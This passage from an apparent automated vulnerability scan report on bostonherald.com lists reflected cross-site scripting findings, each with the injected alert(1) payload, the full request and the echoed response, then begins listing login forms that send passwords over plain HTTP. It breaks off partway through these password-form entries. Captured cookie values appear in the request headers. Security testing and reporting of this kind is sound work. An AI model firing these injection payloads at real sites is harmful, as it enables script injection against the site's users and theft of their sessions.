Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.14.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.4.10.1289175481; RMFD=011PFFPzO101yed8|O1021J6R

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 03:50:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2675
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<div id="adCompanionSubstitute" class="w320f4376\"><script>alert(1)</script>4dba9d01cdxh275">
...[SNIP]...

2.20. http://bostonherald.com/news/columnists/view.bg [format parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/columnists/view.bg

Issue detail

The value of the format request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af359'-alert(1)-'ec9b8fee0e1 was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /news/columnists/view.bg?articleid=1294590&format=commentsaf359'-alert(1)-'ec9b8fee0e1&srvc=news&position=3 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:29:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<script type="text/javascript">

       // Converts the GET params to a JSON object
       GET_Params = 'articleid=1294590&format=commentsaf359'-alert(1)-'ec9b8fee0e1&srvc=news&position=3'.toQueryParams();

       //alert(Object.inspect(GET_Params));
       //-----------------------------------------------------------------
       function updatePage(key,val) {
       //-------
...[SNIP]...

2.21. http://bostonherald.com/news/document.bg [f parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/document.bg

Issue detail

The value of the f request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3abb9"%3balert(1)//09f0d1d0ca6 was submitted in the f parameter. This input was echoed as 3abb9";alert(1)//09f0d1d0ca6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /news/document.bg?f=misc/100216housing.pdf3abb9"%3balert(1)//09f0d1d0ca6&h=Massachusetts%20Housing%20Partnership&k=bh HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:53:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 26495

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<script type="text/javascript">

var iframe_container_div = $("iframe_wrapper");
var iframe_pdf_source = "http://multimedia.bostonherald.com/misc/100216housing.pdf3abb9";alert(1)//09f0d1d0ca6";

a1 = document.createElement("iframe");
a1.setAttribute("id","document_reader");
a1.setAttribute("src",iframe_pdf_source);
a1.setAttribute("frameborder","0");
a1.setAttribute("scrolling","no")
...[SNIP]...

2.22. http://bostonherald.com/news/document.bg [h parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/document.bg

Issue detail

The value of the h request parameter is copied into the HTML document as plain text between tags. The payload 82da8<script>alert(1)</script>be396cef868 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/document.bg?f=misc/100216housing.pdf&h=Massachusetts%20Housing%20Partnership82da8<script>alert(1)</script>be396cef868&k=bh HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:54:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 26521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<h1>Massachusetts Housing Partnership82da8<script>alert(1)</script>be396cef868</h1>
...[SNIP]...

2.23. http://bostonherald.com/news/regional/view.bg [format parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view.bg

Issue detail

The value of the format request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 520d6'-alert(1)-'5950651885a was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /news/regional/view.bg?articleid=1294599&format=comments520d6'-alert(1)-'5950651885a&srvc=news&position=2 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:15:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<script type="text/javascript">

       // Converts the GET params to a JSON object
       GET_Params = 'articleid=1294599&format=comments520d6'-alert(1)-'5950651885a&srvc=news&position=2'.toQueryParams();

       //alert(Object.inspect(GET_Params));
       //-----------------------------------------------------------------
       function updatePage(key,val) {
       //-------
...[SNIP]...

2.24. http://bostonherald.com/search/ [topic parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/search/

Issue detail

The value of the topic request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68cfb</script><script>alert(1)</script>aa25e7cca37 was submitted in the topic parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /search/?topic=Jessica68cfb</script><script>alert(1)</script>aa25e7cca37 Fargen&type=byline&searchSite=recent&x=10&y=10 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 03:09:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<script language="Javascript">
// Ajax search

page($('search_opt_type').options[$('search_opt_type').selectedIndex].value,'1','','search','Jessica68cfb</script><script>alert(1)</script>aa25e7cca37');
//pageTracker._trackPageview('/search/index.bg?&order=&page=1');
location.hash='articleFull';
</script>
...[SNIP]...

2.25. http://bostonherald.com/search/ [topic parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/search/

Issue detail

The value of the topic request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4de6f"><script>alert(1)</script>4f07299c93e was submitted in the topic parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/?topic=Jessica4de6f"><script>alert(1)</script>4f07299c93e Fargen&type=byline&searchSite=recent&x=10&y=10 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 03:09:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<input class="mainSearchinut" id="searchInput" type="text" value="Jessica4de6f"><script>alert(1)</script>4f07299c93e" name="topic" />
...[SNIP]...

2.26. http://bostonherald.com/sports/football/patriots/view.bg [format parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/football/patriots/view.bg

Issue detail

The value of the format request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23db4'-alert(1)-'fa7faa1b9d9 was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sports/football/patriots/view.bg?articleid=1294646&format=comments23db4'-alert(1)-'fa7faa1b9d9&srvc=home&position=active HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:27:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<script type="text/javascript">

       // Converts the GET params to a JSON object
       GET_Params = 'articleid=1294646&format=comments23db4'-alert(1)-'fa7faa1b9d9&srvc=home&position=active'.toQueryParams();

       //alert(Object.inspect(GET_Params));
       //-----------------------------------------------------------------
       function updatePage(key,val) {
       //--
...[SNIP]...

2.27. http://bostonherald.com/sports/football/patriots/view.bg [format parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/football/patriots/view.bg

Issue detail

The value of the format request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3bf7"><script>alert(1)</script>8da545a59fc was submitted in the format parameter. This input was echoed as f3bf7\"><script>alert(1)</script>8da545a59fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/football/patriots/view.bg?articleid=1294646&format=commentsf3bf7"><script>alert(1)</script>8da545a59fc&srvc=home&position=active HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:27:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<a class="bold current" href="/sports/football/patriots/view.bg?&articleid=1294646&format=commentsf3bf7\"><script>alert(1)</script>8da545a59fc&page=1&listingType=pats#articleFull" >
...[SNIP]...

3. Cleartext submission of password previous next
There are 28 instances of this issue:

/business/automotive/view/20101107blinking_jetta_hates_her_husband/format=comments&srvc=home&position=also
/business/general/view/20101107bruins_cap_season_ticket_sales_more_single-game_seats_as_attendance_up_12/format=comments&srvc=home&position=also
/business/healthcare/view/20101107regulation_hurts_medical_supplier/format=comments&srvc=home&position=5
/business/real_estate/view/20101107critics_hit_feds_appraisal_rules/format=comments&srvc=home&position=also
/jobfind/news/media/view/20101107olbermann_suspension_highlights_ethics_rules/format=comments&srvc=home&position=also
/news/columnists/view.bg
/news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/format=comments&srvc=home&position=also
/news/columnists/view/20101107puerto_rican_vets_seek_honor/format=comments&srvc=news&position=also
/news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/format=comments&srvc=news&position=also
/news/national/northeast/view/20101107jury_in_connecticut_home_invasion_case_back_for_3rd_day/format=comments&srvc=news&position=also
/news/offbeat/view/20101107dont_worry_mother_im_coming_to_save_you/format=comments&srvc=news&position=also
/news/opinion/op_ed/view/20101107dems_find_way_to_ignore_voters_will/format=comments&srvc=news&position=also
/news/police_logs/view/20101105caught_green_handed/format=comments&srvc=news&position=also
/news/politics/view/20101107moneybags_menino/format=comments&srvc=news&position=also
/news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/format=comments&srvc=home&position=1
/news/regional/view.bg
/news/regional/view/20101107church-sale_plan_causes_beef/format=comments&srvc=home&position=3
/news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/format=comments&srvc=home&position=2
/news/regional/view/20101107teen_mom_due_in_court_for_allegedly_tossing_infant/format=comments&srvc=news&position=also
/sports/football/patriots/view.bg
/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/format=comments&srvc=home&position=0
/sports/football/patriots/view/20101107gil_brandt_likes_patriots_dirty_dozen_redux/format=comments&srvc=home&position=also
/sports/football/patriots/view/20101107just_as_he_drew_it_up_bledsoes_post-career_planning_a_big_success_thanks_to_family_and_businesses_worth_toasting/format=comments&srvc=home&position=4
/track/inside_track/view/20101107rick_fox_sees_celtics_as_cream_team/format=comments&srvc=home&position=also
/track/star_tracks/view/20101107ben_affleck_returns_unearned_spoils/format=comments&srvc=home&position=6
/users/login
/users/register
/users/register/

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

3.1. http://bostonherald.com/business/automotive/view/20101107blinking_jetta_hates_her_husband/format=comments&srvc=home&position=also previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/automotive/view/20101107blinking_jetta_hates_her_husband/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/business/automotive/view/20101107blinking_jetta_hates_her_husband/format=comments&srvc=home&position=also

The form contains the following password fields:

password
confirm_password

Request

GET /business/automotive/view/20101107blinking_jetta_hates_her_husband/format=comments&srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

3.2. http://bostonherald.com/business/general/view/20101107bruins_cap_season_ticket_sales_more_single-game_seats_as_attendance_up_12/format=comments&srvc=home&position=also previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/general/view/20101107bruins_cap_season_ticket_sales_more_single-game_seats_as_attendance_up_12/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/business/general/view/20101107bruins_cap_season_ticket_sales_more_single-game_seats_as_attendance_up_12/format=comments&srvc=home&position=also

The form contains the following password fields:

password
confirm_password

Request

GET /business/general/view/20101107bruins_cap_season_ticket_sales_more_single-game_seats_as_attendance_up_12/format=comments&srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

3.3. http://bostonherald.com/business/healthcare/view/20101107regulation_hurts_medical_supplier/format=comments&srvc=home&position=5 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/healthcare/view/20101107regulation_hurts_medical_supplier/format=comments&srvc=home&position=5

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/business/healthcare/view/20101107regulation_hurts_medical_supplier/format=comments&srvc=home&position=5

The form contains the following password fields:

password
confirm_password

Request

GET /business/healthcare/view/20101107regulation_hurts_medical_supplier/format=comments&srvc=home&position=5 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

3.4. http://bostonherald.com/business/real_estate/view/20101107critics_hit_feds_appraisal_rules/format=comments&srvc=home&position=also previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/real_estate/view/20101107critics_hit_feds_appraisal_rules/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/business/real_estate/view/20101107critics_hit_feds_appraisal_rules/format=comments&srvc=home&position=also

The form contains the following password fields:

password
confirm_password

Request

GET /business/real_estate/view/20101107critics_hit_feds_appraisal_rules/format=comments&srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
